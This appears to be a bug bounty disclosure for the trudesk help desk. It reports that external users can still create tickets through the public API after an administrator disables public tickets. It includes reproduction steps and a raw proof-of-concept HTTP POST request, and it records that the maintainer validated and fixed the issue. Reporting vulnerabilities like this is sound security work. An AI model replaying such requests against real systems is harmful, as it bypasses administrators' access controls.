Improper Privilege Management in polonel/trudesk

Valid

Reported on

Jun 15th 2021


💥 BUG

external user can submit ticket even when its disabled

💥 SUMMURY

external user can submit ticket even when its disabled

💥 STEP TO REPRODUCE

1. First from admin account goto settings-->tickets and disallow Allow public tickets .
So, external user cant create ticket using url http://localhost:8118/newissue .

2. Now as a external user , sent bellow request which will create a public ticket

POST /api/v1/public/tickets/create HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 138
Origin: http://localhost:8118
DNT: 1
Connection: close
Referer: http://localhost:8118/newissue
Cookie: $trudesk%3Atimezone=America/New_York; connect.sid=s%3AbDPu1729Dob3ofg_TynNCd_EID7q1h3y.i5p4vnPCeYzyF2mqbEvcE4E%2BVZDHrjhkquUJxSvKbi0

{"user":{"fullname":"afaaaaterss","email":"vsssvvv@sssss.com"},"ticket":{"subject":"2222mmmm","issue":"afffteraaaaaaaa"},"captcha":"PVjf"}

So, despite of being disabled for public ticket creation , still user can create ticket

Occurrences

Chris Brame validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Chris Brame confirmed that a fix has been merged on 17c2eb a year ago
Chris Brame has been awarded the fix bounty
to join this conversation